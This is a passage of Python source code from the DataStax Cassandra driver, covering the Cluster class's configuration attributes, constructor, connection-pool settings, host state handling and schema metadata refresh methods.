with a custom or `back-ported function <https://pypi.python.org/pypi/backports.ssl_match_hostname>`_.
"""
sockopts = None
"""
An optional list of tuples which will be used as arguments to
``socket.setsockopt()`` for all created sockets.
Note: some drivers find setting TCPNODELAY beneficial in the context of
their execution model. It was not found generally beneficial for this driver.
To try with your own workload, set ``sockopts = [(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)]``
"""
max_schema_agreement_wait = 10
"""
The maximum duration (in seconds) that the driver will wait for schema
agreement across the cluster. Defaults to ten seconds.
If set <= 0, the driver will bypass schema agreement waits altogether.
"""
metadata = None
"""
An instance of :class:`cassandra.metadata.Metadata`.
"""
connection_class = DefaultConnection
"""
This determines what event loop system will be used for managing
I/O with Cassandra. These are the current options:
* :class:`cassandra.io.asyncorereactor.AsyncoreConnection`
* :class:`cassandra.io.libevreactor.LibevConnection`
* :class:`cassandra.io.eventletreactor.EventletConnection` (requires monkey-patching - see doc for details)
* :class:`cassandra.io.geventreactor.GeventConnection` (requires monkey-patching - see doc for details)
* :class:`cassandra.io.twistedreactor.TwistedConnection`
By default, ``AsyncoreConnection`` will be used, which uses
the ``asyncore`` module in the Python standard library.
If ``libev`` is installed, ``LibevConnection`` will be used instead.
If ``gevent`` or ``eventlet`` monkey-patching is detected, the corresponding
connection class will be used automatically.
"""
control_connection_timeout = 2.0
"""
A timeout, in seconds, for queries made by the control connection, such
as querying the current schema and information about nodes in the cluster.
If set to :const:`None`, there will be no timeout for these queries.
"""
idle_heartbeat_interval = 30
"""
Interval, in seconds, on which to heartbeat idle connections. This helps
keep connections open through network devices that expire idle connections.
It also helps discover bad connections early in low-traffic scenarios.
Setting to zero disables heartbeats.
"""
schema_event_refresh_window = 2
"""
Window, in seconds, within which a schema component will be refreshed after
receiving a schema_change event.
The driver delays a random amount of time in the range [0.0, window)
before executing the refresh. This serves two purposes:
1.) Spread the refresh for deployments with large fanout from C* to client tier,
preventing a 'thundering herd' problem with many clients refreshing simultaneously.
2.) Remove redundant refreshes. Redundant events arriving within the delay period
are discarded, and only one refresh is executed.
Setting this to zero will execute refreshes immediately.
Setting this negative will disable schema refreshes in response to push events
(refreshes will still occur in response to schema change responses to DDL statements
executed by Sessions of this Cluster).
"""
topology_event_refresh_window = 10
"""
Window, in seconds, within which the node and token list will be refreshed after
receiving a topology_change event.
Setting this to zero will execute refreshes immediately.
Setting this negative will disable node refreshes in response to push events.
See :attr:`.schema_event_refresh_window` for discussion of rationale
"""
status_event_refresh_window = 2
"""
Window, in seconds, within which the driver will start the reconnect after
receiving a status_change event.
Setting this to zero will connect immediately.
This is primarily used to avoid 'thundering herd' in deployments with large fanout from cluster to clients.
When nodes come up, clients attempt to reprepare prepared statements (depending on :attr:`.reprepare_on_up`), and
establish connection pools. This can cause a rush of connections and queries if not mitigated with this factor.
"""
prepare_on_all_hosts = True
"""
Specifies whether statements should be prepared on all hosts, or just one.
This can reasonably be disabled on long-running applications with numerous clients preparing statements on startup,
where a randomized initial condition of the load balancing policy can be expected to distribute prepares from
different clients across the cluster.
"""
reprepare_on_up = True
"""
Specifies whether all known prepared statements should be prepared on a node when it comes up.
May be used to avoid overwhelming a node on return, or if it is supposed that the node was only marked down due to
network. If statements are not reprepared, they are prepared on the first execution, causing
an extra roundtrip for one or more client requests.
"""
connect_timeout = 5
"""
Timeout, in seconds, for creating new connections.
This timeout covers the entire connection negotiation, including TCP
establishment, options passing, and authentication.
"""
@property
def schema_metadata_enabled(self):
"""
Flag indicating whether internal schema metadata is updated.
When disabled, the driver does not populate Cluster.metadata.keyspaces on connect, or on schema change events. This
can be used to speed initial connection, and reduce load on client and server during operation. Turning this off
gives away token aware request routing, and programmatic inspection of the metadata model.
"""
return self.control_connection._schema_meta_enabled
@schema_metadata_enabled.setter
def schema_metadata_enabled(self, enabled):
self.control_connection._schema_meta_enabled = bool(enabled)
@property
def token_metadata_enabled(self):
"""
Flag indicating whether internal token metadata is updated.
When disabled, the driver does not query node token information on connect, or on topology change events. This
can be used to speed initial connection, and reduce load on client and server during operation. It is most useful
in large clusters using vnodes, where the token map can be expensive to compute. Turning this off
gives away token aware request routing, and programmatic inspection of the token ring.
"""
return self.control_connection._token_meta_enabled
@token_metadata_enabled.setter
def token_metadata_enabled(self, enabled):
self.control_connection._token_meta_enabled = bool(enabled)
sessions = None
control_connection = None
scheduler = None
executor = None
is_shutdown = False
_is_setup = False
_prepared_statements = None
_prepared_statement_lock = None
_idle_heartbeat = None
_user_types = None
"""
A map of {keyspace: {type_name: UserType}}
"""
_listeners = None
_listener_lock = None
def __init__(self,
contact_points=["127.0.0.1"],
port=9042,
compression=True,
auth_provider=None,
load_balancing_policy=None,
reconnection_policy=None,
default_retry_policy=None,
conviction_policy_factory=None,
metrics_enabled=False,
connection_class=None,
ssl_options=None,
sockopts=None,
cql_version=None,
protocol_version=4,
executor_threads=2,
max_schema_agreement_wait=10,
control_connection_timeout=2.0,
idle_heartbeat_interval=30,
schema_event_refresh_window=2,
topology_event_refresh_window=10,
connect_timeout=5,
schema_metadata_enabled=True,
token_metadata_enabled=True,
address_translator=None,
status_event_refresh_window=2,
prepare_on_all_hosts=True,
reprepare_on_up=True):
"""
``executor_threads`` defines the number of threads in a pool for handling asynchronous tasks such as
extablishing connection pools or refreshing metadata.
Any of the mutable Cluster attributes may be set as keyword arguments to the constructor.
"""
if contact_points is not None:
if isinstance(contact_points, six.string_types):
raise TypeError("contact_points should not be a string, it should be a sequence (e.g. list) of strings")
if None in contact_points:
raise ValueError("contact_points should not contain None (it can resolve to localhost)")
self.contact_points = contact_points
self.port = port
self.contact_points_resolved = [endpoint[4][0] for a in self.contact_points
for endpoint in socket.getaddrinfo(a, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)]
self.compression = compression
self.protocol_version = protocol_version
self.auth_provider = auth_provider
if load_balancing_policy is not None:
if isinstance(load_balancing_policy, type):
raise TypeError("load_balancing_policy should not be a class, it should be an instance of that class")
self.load_balancing_policy = load_balancing_policy
else:
self.load_balancing_policy = default_lbp_factory()
if reconnection_policy is not None:
if isinstance(reconnection_policy, type):
raise TypeError("reconnection_policy should not be a class, it should be an instance of that class")
self.reconnection_policy = reconnection_policy
if default_retry_policy is not None:
if isinstance(default_retry_policy, type):
raise TypeError("default_retry_policy should not be a class, it should be an instance of that class")
self.default_retry_policy = default_retry_policy
if conviction_policy_factory is not None:
if not callable(conviction_policy_factory):
raise ValueError("conviction_policy_factory must be callable")
self.conviction_policy_factory = conviction_policy_factory
if address_translator is not None:
if isinstance(address_translator, type):
raise TypeError("address_translator should not be a class, it should be an instance of that class")
self.address_translator = address_translator
if connection_class is not None:
self.connection_class = connection_class
self.metrics_enabled = metrics_enabled
self.ssl_options = ssl_options
self.sockopts = sockopts
self.cql_version = cql_version
self.max_schema_agreement_wait = max_schema_agreement_wait
self.control_connection_timeout = control_connection_timeout
self.idle_heartbeat_interval = idle_heartbeat_interval
self.schema_event_refresh_window = schema_event_refresh_window
self.topology_event_refresh_window = topology_event_refresh_window
self.status_event_refresh_window = status_event_refresh_window
self.connect_timeout = connect_timeout
self.prepare_on_all_hosts = prepare_on_all_hosts
self.reprepare_on_up = reprepare_on_up
self._listeners = set()
self._listener_lock = Lock()
# let Session objects be GC'ed (and shutdown) when the user no longer
# holds a reference.
self.sessions = WeakSet()
self.metadata = Metadata()
self.control_connection = None
self._prepared_statements = WeakValueDictionary()
self._prepared_statement_lock = Lock()
self._user_types = defaultdict(dict)
self._min_requests_per_connection = {
HostDistance.LOCAL: DEFAULT_MIN_REQUESTS,
HostDistance.REMOTE: DEFAULT_MIN_REQUESTS
}
self._max_requests_per_connection = {
HostDistance.LOCAL: DEFAULT_MAX_REQUESTS,
HostDistance.REMOTE: DEFAULT_MAX_REQUESTS
}
self._core_connections_per_host = {
HostDistance.LOCAL: DEFAULT_MIN_CONNECTIONS_PER_LOCAL_HOST,
HostDistance.REMOTE: DEFAULT_MIN_CONNECTIONS_PER_REMOTE_HOST
}
self._max_connections_per_host = {
HostDistance.LOCAL: DEFAULT_MAX_CONNECTIONS_PER_LOCAL_HOST,
HostDistance.REMOTE: DEFAULT_MAX_CONNECTIONS_PER_REMOTE_HOST
}
self.executor = ThreadPoolExecutor(max_workers=executor_threads)
self.scheduler = _Scheduler(self.executor)
self._lock = RLock()
if self.metrics_enabled:
from cassandra.metrics import Metrics
self.metrics = Metrics(weakref.proxy(self))
self.control_connection = ControlConnection(
self, self.control_connection_timeout,
self.schema_event_refresh_window, self.topology_event_refresh_window,
self.status_event_refresh_window,
schema_metadata_enabled, token_metadata_enabled)
def register_user_type(self, keyspace, user_type, klass):
"""
Registers a class to use to represent a particular user-defined type.
Query parameters for this user-defined type will be assumed to be
instances of `klass`. Result sets for this user-defined type will
be instances of `klass`. If no class is registered for a user-defined
type, a namedtuple will be used for result sets, and non-prepared
statements may not encode parameters for this type correctly.
`keyspace` is the name of the keyspace that the UDT is defined in.
`user_type` is the string name of the UDT to register the mapping
for.
`klass` should be a class with attributes whose names match the
fields of the user-defined type. The constructor must accepts kwargs
for each of the fields in the UDT.
This method should only be called after the type has been created
within Cassandra.
Example::
cluster = Cluster(protocol_version=3)
session = cluster.connect()
session.set_keyspace('mykeyspace')
session.execute("CREATE TYPE address (street text, zipcode int)")
session.execute("CREATE TABLE users (id int PRIMARY KEY, location address)")
# create a class to map to the "address" UDT
class Address(object):
def __init__(self, street, zipcode):
self.street = street
self.zipcode = zipcode
cluster.register_user_type('mykeyspace', 'address', Address)
# insert a row using an instance of Address
session.execute("INSERT INTO users (id, location) VALUES (%s, %s)",
(0, Address("123 Main St.", 78723)))
# results will include Address instances
results = session.execute("SELECT * FROM users")
row = results[0]
print row.id, row.location.street, row.location.zipcode
"""
if self.protocol_version < 3:
log.warning("User Type serialization is only supported in native protocol version 3+ (%d in use). "
"CQL encoding for simple statements will still work, but named tuples will "
"be returned when reading type %s.%s.", self.protocol_version, keyspace, user_type)
self._user_types[keyspace][user_type] = klass
for session in self.sessions:
session.user_type_registered(keyspace, user_type, klass)
UserType.evict_udt_class(keyspace, user_type)
def get_min_requests_per_connection(self, host_distance):
return self._min_requests_per_connection[host_distance]
def set_min_requests_per_connection(self, host_distance, min_requests):
"""
Sets a threshold for concurrent requests per connection, below which
connections will be considered for disposal (down to core connections;
see :meth:`~Cluster.set_core_connections_per_host`).
Pertains to connection pool management in protocol versions {1,2}.
"""
if self.protocol_version >= 3:
raise UnsupportedOperation(
"Cluster.set_min_requests_per_connection() only has an effect "
"when using protocol_version 1 or 2.")
if min_requests < 0 or min_requests > 126 or \
min_requests >= self._max_requests_per_connection[host_distance]:
raise ValueError("min_requests must be 0-126 and less than the max_requests for this host_distance (%d)" %
(self._min_requests_per_connection[host_distance],))
self._min_requests_per_connection[host_distance] = min_requests
def get_max_requests_per_connection(self, host_distance):
return self._max_requests_per_connection[host_distance]
def set_max_requests_per_connection(self, host_distance, max_requests):
"""
Sets a threshold for concurrent requests per connection, above which new
connections will be created to a host (up to max connections;
see :meth:`~Cluster.set_max_connections_per_host`).
Pertains to connection pool management in protocol versions {1,2}.
"""
if self.protocol_version >= 3:
raise UnsupportedOperation(
"Cluster.set_max_requests_per_connection() only has an effect "
"when using protocol_version 1 or 2.")
if max_requests < 1 or max_requests > 127 or \
max_requests <= self._min_requests_per_connection[host_distance]:
raise ValueError("max_requests must be 1-127 and greater than the min_requests for this host_distance (%d)" %
(self._min_requests_per_connection[host_distance],))
self._max_requests_per_connection[host_distance] = max_requests
def get_core_connections_per_host(self, host_distance):
"""
Gets the minimum number of connections per Session that will be opened
for each host with :class:`~.HostDistance` equal to `host_distance`.
The default is 2 for :attr:`~HostDistance.LOCAL` and 1 for
:attr:`~HostDistance.REMOTE`.
This property is ignored if :attr:`~.Cluster.protocol_version` is
3 or higher.
"""
return self._core_connections_per_host[host_distance]
def set_core_connections_per_host(self, host_distance, core_connections):
"""
Sets the minimum number of connections per Session that will be opened
for each host with :class:`~.HostDistance` equal to `host_distance`.
The default is 2 for :attr:`~HostDistance.LOCAL` and 1 for
:attr:`~HostDistance.REMOTE`.
Protocol version 1 and 2 are limited in the number of concurrent
requests they can send per connection. The driver implements connection
pooling to support higher levels of concurrency.
If :attr:`~.Cluster.protocol_version` is set to 3 or higher, this
is not supported (there is always one connection per host, unless
the host is remote and :attr:`connect_to_remote_hosts` is :const:`False`)
and using this will result in an :exc:`~.UnsupporteOperation`.
"""
if self.protocol_version >= 3:
raise UnsupportedOperation(
"Cluster.set_core_connections_per_host() only has an effect "
"when using protocol_version 1 or 2.")
old = self._core_connections_per_host[host_distance]
self._core_connections_per_host[host_distance] = core_connections
if old < core_connections:
self._ensure_core_connections()
def get_max_connections_per_host(self, host_distance):
"""
Gets the maximum number of connections per Session that will be opened
for each host with :class:`~.HostDistance` equal to `host_distance`.
The default is 8 for :attr:`~HostDistance.LOCAL` and 2 for
:attr:`~HostDistance.REMOTE`.
This property is ignored if :attr:`~.Cluster.protocol_version` is
3 or higher.
"""
return self._max_connections_per_host[host_distance]
def set_max_connections_per_host(self, host_distance, max_connections):
"""
Sets the maximum number of connections per Session that will be opened
for each host with :class:`~.HostDistance` equal to `host_distance`.
The default is 2 for :attr:`~HostDistance.LOCAL` and 1 for
:attr:`~HostDistance.REMOTE`.
If :attr:`~.Cluster.protocol_version` is set to 3 or higher, this
is not supported (there is always one connection per host, unless
the host is remote and :attr:`connect_to_remote_hosts` is :const:`False`)
and using this will result in an :exc:`~.UnsupporteOperation`.
"""
if self.protocol_version >= 3:
raise UnsupportedOperation(
"Cluster.set_max_connections_per_host() only has an effect "
"when using protocol_version 1 or 2.")
self._max_connections_per_host[host_distance] = max_connections
def connection_factory(self, address, *args, **kwargs):
"""
Called to create a new connection with proper configuration.
Intended for internal use only.
"""
kwargs = self._make_connection_kwargs(address, kwargs)
return self.connection_class.factory(address, self.connect_timeout, *args, **kwargs)
def _make_connection_factory(self, host, *args, **kwargs):
kwargs = self._make_connection_kwargs(host.address, kwargs)
return partial(self.connection_class.factory, host.address, self.connect_timeout, *args, **kwargs)
def _make_connection_kwargs(self, address, kwargs_dict):
if self._auth_provider_callable:
kwargs_dict.setdefault('authenticator', self._auth_provider_callable(address))
kwargs_dict.setdefault('port', self.port)
kwargs_dict.setdefault('compression', self.compression)
kwargs_dict.setdefault('sockopts', self.sockopts)
kwargs_dict.setdefault('ssl_options', self.ssl_options)
kwargs_dict.setdefault('cql_version', self.cql_version)
kwargs_dict.setdefault('protocol_version', self.protocol_version)
kwargs_dict.setdefault('user_type_map', self._user_types)
return kwargs_dict
def protocol_downgrade(self, host_addr, previous_version):
new_version = previous_version - 1
if new_version < self.protocol_version:
if new_version >= MIN_SUPPORTED_VERSION:
log.warning("Downgrading core protocol version from %d to %d for %s. "
"To avoid this, it is best practice to explicitly set Cluster(protocol_version) to the version supported by your cluster. "
"http://datastax.github.io/python-driver/api/cassandra/cluster.html#cassandra.cluster.Cluster.protocol_version", self.protocol_version, new_version, host_addr)
self.protocol_version = new_version
else:
raise DriverException("Cannot downgrade protocol version (%d) below minimum supported version: %d" % (new_version, MIN_SUPPORTED_VERSION))
def connect(self, keyspace=None):
"""
Creates and returns a new :class:`~.Session` object. If `keyspace`
is specified, that keyspace will be the default keyspace for
operations on the ``Session``.
"""
with self._lock:
if self.is_shutdown:
raise DriverException("Cluster is already shut down")
if not self._is_setup:
log.debug("Connecting to cluster, contact points: %s; protocol version: %s",
self.contact_points, self.protocol_version)
self.connection_class.initialize_reactor()
_register_cluster_shutdown(self)
for address in self.contact_points_resolved:
host, new = self.add_host(address, signal=False)
if new:
host.set_up()
for listener in self.listeners:
listener.on_add(host)
self.load_balancing_policy.populate(
weakref.proxy(self), self.metadata.all_hosts())
try:
self.control_connection.connect()
log.debug("Control connection created")
except Exception:
log.exception("Control connection failed to connect, "
"shutting down Cluster:")
self.shutdown()
raise
self.load_balancing_policy.check_supported()
if self.idle_heartbeat_interval:
self._idle_heartbeat = ConnectionHeartbeat(self.idle_heartbeat_interval, self.get_connection_holders)
self._is_setup = True
session = self._new_session()
if keyspace:
session.set_keyspace(keyspace)
return session
def get_connection_holders(self):
holders = []
for s in self.sessions:
holders.extend(s.get_pools())
holders.append(self.control_connection)
return holders
def shutdown(self):
"""
Closes all sessions and connection associated with this Cluster.
To ensure all connections are properly closed, **you should always
call shutdown() on a Cluster instance when you are done with it**.
Once shutdown, a Cluster should not be used for any purpose.
"""
with self._lock:
if self.is_shutdown:
return
else:
self.is_shutdown = True
if self._idle_heartbeat:
self._idle_heartbeat.stop()
self.scheduler.shutdown()
self.control_connection.shutdown()
for session in self.sessions:
session.shutdown()
self.executor.shutdown()
_discard_cluster_shutdown(self)
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
def _new_session(self):
session = Session(self, self.metadata.all_hosts())
self._session_register_user_types(session)
self.sessions.add(session)
return session
def _session_register_user_types(self, session):
for keyspace, type_map in six.iteritems(self._user_types):
for udt_name, klass in six.iteritems(type_map):
session.user_type_registered(keyspace, udt_name, klass)
def _cleanup_failed_on_up_handling(self, host):
self.load_balancing_policy.on_down(host)
self.control_connection.on_down(host)
for session in self.sessions:
session.remove_pool(host)
self._start_reconnector(host, is_host_addition=False)
def _on_up_future_completed(self, host, futures, results, lock, finished_future):
with lock:
futures.discard(finished_future)
try:
results.append(finished_future.result())
except Exception as exc:
results.append(exc)
if futures:
return
try:
# all futures have completed at this point
for exc in [f for f in results if isinstance(f, Exception)]:
log.error("Unexpected failure while marking node %s up:", host, exc_info=exc)
self._cleanup_failed_on_up_handling(host)
return
if not all(results):
log.debug("Connection pool could not be created, not marking node %s up", host)
self._cleanup_failed_on_up_handling(host)
return
log.info("Connection pools established for node %s", host)
# mark the host as up and notify all listeners
host.set_up()
for listener in self.listeners:
listener.on_up(host)
finally:
with host.lock:
host._currently_handling_node_up = False
# see if there are any pools to add or remove now that the host is marked up
for session in self.sessions:
session.update_created_pools()
def on_up(self, host):
"""
Intended for internal use only.
"""
if self.is_shutdown:
return
log.debug("Waiting to acquire lock for handling up status of node %s", host)
with host.lock:
if host._currently_handling_node_up:
log.debug("Another thread is already handling up status of node %s", host)
return
if host.is_up:
log.debug("Host %s was already marked up", host)
return
host._currently_handling_node_up = True
log.debug("Starting to handle up status of node %s", host)
have_future = False
futures = set()
try:
log.info("Host %s may be up; will prepare queries and open connection pool", host)
reconnector = host.get_and_set_reconnection_handler(None)
if reconnector:
log.debug("Now that host %s is up, cancelling the reconnection handler", host)
reconnector.cancel()
self._prepare_all_queries(host)
log.debug("Done preparing all queries for host %s, ", host)
for session in self.sessions:
session.remove_pool(host)
log.debug("Signalling to load balancing policy that host %s is up", host)
self.load_balancing_policy.on_up(host)
log.debug("Signalling to control connection that host %s is up", host)
self.control_connection.on_up(host)
log.debug("Attempting to open new connection pools for host %s", host)
futures_lock = Lock()
futures_results = []
callback = partial(self._on_up_future_completed, host, futures, futures_results, futures_lock)
for session in self.sessions:
future = session.add_or_renew_pool(host, is_host_addition=False)
if future is not None:
have_future = True
future.add_done_callback(callback)
futures.add(future)
except Exception:
log.exception("Unexpected failure handling node %s being marked up:", host)
for future in futures:
future.cancel()
self._cleanup_failed_on_up_handling(host)
with host.lock:
host._currently_handling_node_up = False
raise
else:
if not have_future:
with host.lock:
host._currently_handling_node_up = False
# for testing purposes
return futures
def _start_reconnector(self, host, is_host_addition):
if self.load_balancing_policy.distance(host) == HostDistance.IGNORED:
return
schedule = self.reconnection_policy.new_schedule()
# in order to not hold references to this Cluster open and prevent
# proper shutdown when the program ends, we'll just make a closure
# of the current Cluster attributes to create new Connections with
conn_factory = self._make_connection_factory(host)
reconnector = _HostReconnectionHandler(
host, conn_factory, is_host_addition, self.on_add, self.on_up,
self.scheduler, schedule, host.get_and_set_reconnection_handler,
new_handler=None)
old_reconnector = host.get_and_set_reconnection_handler(reconnector)
if old_reconnector:
log.debug("Old host reconnector found for %s, cancelling", host)
old_reconnector.cancel()
log.debug("Starting reconnector for host %s", host)
reconnector.start()
@run_in_executor
def on_down(self, host, is_host_addition, expect_host_to_be_down=False):
"""
Intended for internal use only.
"""
if self.is_shutdown:
return
with host.lock:
if (not host.is_up and not expect_host_to_be_down) or host.is_currently_reconnecting():
return
host.set_down()
log.warning("Host %s has been marked down", host)
self.load_balancing_policy.on_down(host)
self.control_connection.on_down(host)
for session in self.sessions:
session.on_down(host)
for listener in self.listeners:
listener.on_down(host)
self._start_reconnector(host, is_host_addition)
def on_add(self, host, refresh_nodes=True):
if self.is_shutdown:
return
log.debug("Handling new host %r and notifying listeners", host)
distance = self.load_balancing_policy.distance(host)
if distance != HostDistance.IGNORED:
self._prepare_all_queries(host)
log.debug("Done preparing queries for new host %r", host)
self.load_balancing_policy.on_add(host)
self.control_connection.on_add(host, refresh_nodes)
if distance == HostDistance.IGNORED:
log.debug("Not adding connection pool for new host %r because the "
"load balancing policy has marked it as IGNORED", host)
self._finalize_add(host, set_up=False)
return
futures_lock = Lock()
futures_results = []
futures = set()
def future_completed(future):
with futures_lock:
futures.discard(future)
try:
futures_results.append(future.result())
except Exception as exc:
futures_results.append(exc)
if futures:
return
log.debug('All futures have completed for added host %s', host)
for exc in [f for f in futures_results if isinstance(f, Exception)]:
log.error("Unexpected failure while adding node %s, will not mark up:", host, exc_info=exc)
return
if not all(futures_results):
log.warning("Connection pool could not be created, not marking node %s up", host)
return
self._finalize_add(host)
have_future = False
for session in self.sessions:
future = session.add_or_renew_pool(host, is_host_addition=True)
if future is not None:
have_future = True
futures.add(future)
future.add_done_callback(future_completed)
if not have_future:
self._finalize_add(host)
def _finalize_add(self, host, set_up=True):
if set_up:
host.set_up()
for listener in self.listeners:
listener.on_add(host)
# see if there are any pools to add or remove now that the host is marked up
for session in self.sessions:
session.update_created_pools()
def on_remove(self, host):
if self.is_shutdown:
return
log.debug("Removing host %s", host)
host.set_down()
self.load_balancing_policy.on_remove(host)
for session in self.sessions:
session.on_remove(host)
for listener in self.listeners:
listener.on_remove(host)
self.control_connection.on_remove(host)
def signal_connection_failure(self, host, connection_exc, is_host_addition, expect_host_to_be_down=False):
is_down = host.signal_connection_failure(connection_exc)
if is_down:
self.on_down(host, is_host_addition, expect_host_to_be_down)
return is_down
def add_host(self, address, datacenter=None, rack=None, signal=True, refresh_nodes=True):
"""
Called when adding initial contact points and when the control
connection subsequently discovers a new node.
Returns a Host instance, and a flag indicating whether it was new in
the metadata.
Intended for internal use only.
"""
host, new = self.metadata.add_or_return_host(Host(address, self.conviction_policy_factory, datacenter, rack))
if new and signal:
log.info("New Cassandra host %r discovered", host)
self.on_add(host, refresh_nodes)
return host, new
def remove_host(self, host):
"""
Called when the control connection observes that a node has left the
ring. Intended for internal use only.
"""
if host and self.metadata.remove_host(host):
log.info("Cassandra host %s removed", host)
self.on_remove(host)
def register_listener(self, listener):
"""
Adds a :class:`cassandra.policies.HostStateListener` subclass instance to
the list of listeners to be notified when a host is added, removed,
marked up, or marked down.
"""
with self._listener_lock:
self._listeners.add(listener)
def unregister_listener(self, listener):
""" Removes a registered listener. """
with self._listener_lock:
self._listeners.remove(listener)
@property
def listeners(self):
with self._listener_lock:
return self._listeners.copy()
def _ensure_core_connections(self):
"""
If any host has fewer than the configured number of core connections
open, attempt to open connections until that number is met.
"""
for session in self.sessions:
for pool in session._pools.values():
pool.ensure_core_connections()
@staticmethod
def _validate_refresh_schema(keyspace, table, usertype, function, aggregate):
if any((table, usertype, function, aggregate)):
if not keyspace:
raise ValueError("keyspace is required to refresh specific sub-entity {table, usertype, function, aggregate}")
if sum(1 for e in (table, usertype, function) if e) > 1:
raise ValueError("{table, usertype, function, aggregate} are mutually exclusive")
@staticmethod
def _target_type_from_refresh_args(keyspace, table, usertype, function, aggregate):
if aggregate:
return SchemaTargetType.AGGREGATE
elif function:
return SchemaTargetType.FUNCTION
elif usertype:
return SchemaTargetType.TYPE
elif table:
return SchemaTargetType.TABLE
elif keyspace:
return SchemaTargetType.KEYSPACE
return None
def refresh_schema_metadata(self, max_schema_agreement_wait=None):
"""
Synchronously refresh all schema metadata.
By default, the timeout for this operation is governed by :attr:`~.Cluster.max_schema_agreement_wait`
and :attr:`~.Cluster.control_connection_timeout`.
Passing max_schema_agreement_wait here overrides :attr:`~.Cluster.max_schema_agreement_wait`.
Setting max_schema_agreement_wait <= 0 will bypass schema agreement and refresh schema immediately.
An Exception is raised if schema refresh fails for any reason.
"""
if not self.control_connection.refresh_schema(schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("Schema metadata was not refreshed. See log for details.")
def refresh_keyspace_metadata(self, keyspace, max_schema_agreement_wait=None):
"""
Synchronously refresh keyspace metadata. This applies to keyspace-level information such as replication
and durability settings. It does not refresh tables, types, etc. contained in the keyspace.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.KEYSPACE, keyspace=keyspace,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("Keyspace metadata was not refreshed. See log for details.")
def refresh_table_metadata(self, keyspace, table, max_schema_agreement_wait=None):
"""
Synchronously refresh table metadata. This applies to a table, and any triggers or indexes attached
to the table.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.TABLE, keyspace=keyspace, table=table,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("Table metadata was not refreshed. See log for details.")
def refresh_materialized_view_metadata(self, keyspace, view, max_schema_agreement_wait=None):
"""
Synchronously refresh materialized view metadata.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.TABLE, keyspace=keyspace, table=view,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("View metadata was not refreshed. See log for details.")
def refresh_user_type_metadata(self, keyspace, user_type, max_schema_agreement_wait=None):
"""
Synchronously refresh user defined type metadata.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.TYPE, keyspace=keyspace, type=user_type,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("User Type metadata was not refreshed. See log for details.")
def refresh_user_function_metadata(self, keyspace, function, max_schema_agreement_wait=None):
"""
Synchronously refresh user defined function metadata.
``function`` is a :class:`cassandra.UserFunctionDescriptor`.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.FUNCTION, keyspace=keyspace, function=function,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("User Function metadata was not refreshed. See log for details.")
def refresh_user_aggregate_metadata(self, keyspace, aggregate, max_schema_agreement_wait=None):
"""
Synchronously refresh user defined aggregate metadata.
``aggregate`` is a :class:`cassandra.UserAggregateDescriptor`.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.AGGREGATE, keyspace=keyspace, aggregate=aggregate,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("User Aggregate metadata was not refreshed. See log for details.")
def refresh_nodes(self):
"""
Synchronously refresh the node list and token metadata
An Exception is raised if node refresh fails for any reason.
"""
if not self.control_connection.refresh_node_list_and_token_map():
raise DriverException("Node list was not refreshed. See log for details.")
def set_meta_refresh_enabled(self, enabled):
"""
*Deprecated:* set :attr:`~.Cluster.schema_metadata_enabled` :attr:`~.Cluster.token_metadata_enabled` instead
Sets a flag to enable (True) or disable (False) all metadata refresh queries.
This applies to both schema and node topology.
Disabling this is useful to minimize refreshes during multiple changes.
Meta refresh must be enabled for the driver to become aware of any cluster
topology changes or schema updates.
"""
self.schema_metadata_enabled = enabled
self.token_metadata_enabled = enabled
def _prepare_all_queries(self, host):
if not self._prepared_statements or not self.reprepare_on_up:
return
log.debug("Preparing all known prepared statements against host %s", host)
connection = None
try:
connection = self.connection_factory(host.address)
statements = self._prepared_statements.values()
for keyspace, ks_statements in groupby(statements, lambda s: s.keyspace):
if keyspace is not None:
connection.set_keyspace_blocking(keyspace)
# prepare 10 statements at a time
ks_statements = list(ks_statements)
chunks = []
for i in range(0, len(ks_statements), 10):
chunks.append(ks_statements[i:i + 10])
for ks_chunk in chunks:
messages = [PrepareMessage(query=s.query_string) for s in ks_chunk]
# TODO: make this timeout configurable somehow?
responses = connection.wait_for_responses(*messages, timeout=5.0, fail_on_error=False)
for success, response in responses:
if not success:
log.debug("Got unexpected response when preparing "
"statement on host %s: %r", host, response)
log.debug("Done preparing all known prepared statements against host %s", host)
except OperationTimedOut as timeout:
log.warning("Timed out trying to prepare all statements on host %s: %s", host, timeout)
except (ConnectionException, socket.error) as exc:
log.warning("Error trying to prepare all statements on host %s: %r", host, exc)
except Exception:
log.exception("Error trying to prepare all statements on host %s", host)
finally:
if connection:
connection.close()
def add_prepared(self, query_id, prepared_statement):
with self._prepared_statement_lock:
self._prepared_statements[query_id] = prepared_statement
class Session(object):
"""
A collection of connection pools for each host in the cluster.
Instances of this class should not be created directly, only
using :meth:`.Cluster.connect()`.
Queries and statements can be executed through ``Session`` instances
using the :meth:`~.Session.execute()` and :meth:`~.Session.execute_async()`
methods.
Example usage::
>>> session = cluster.connect()
>>> session.set_keyspace("mykeyspace")
>>> session.execute("SELECT * FROM mycf")
"""
cluster = None
hosts = None
keyspace = None
is_shutdown = False
row_factory = staticmethod(named_tuple_factory)
"""
The format to return row results in. By default, each
returned row will be a named tuple. You can alternatively
use any of the following:
